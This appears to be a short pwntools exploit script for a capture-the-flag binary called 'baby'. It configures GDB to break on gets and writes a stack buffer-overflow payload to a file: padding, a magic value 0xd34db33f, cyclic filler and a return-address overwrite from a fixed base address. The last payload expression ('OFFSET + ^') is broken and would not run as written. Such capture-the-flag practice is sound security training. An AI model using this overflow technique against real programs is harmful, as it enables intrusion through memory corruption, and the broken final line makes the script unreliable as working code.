from pwn import *
elf = ELF(os.getcwd() + "/baby")

gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
# br *0x5663c4b8
br gets
continue
'''

def start():
    if args.GDB:
        return gdb.debug(elf.path, gs)
    else:
        return process([elf.path])

# io = start()
# input("waiting...")
OFFSET = 0x56555000
with open("input", "wb+") as f:
    f.write(b'A'*42 + p32(1) + p32(0xd34db33f) + cyclic(cyclic_find('caaa')) + p32(OFFSET + ^))
# io.interactive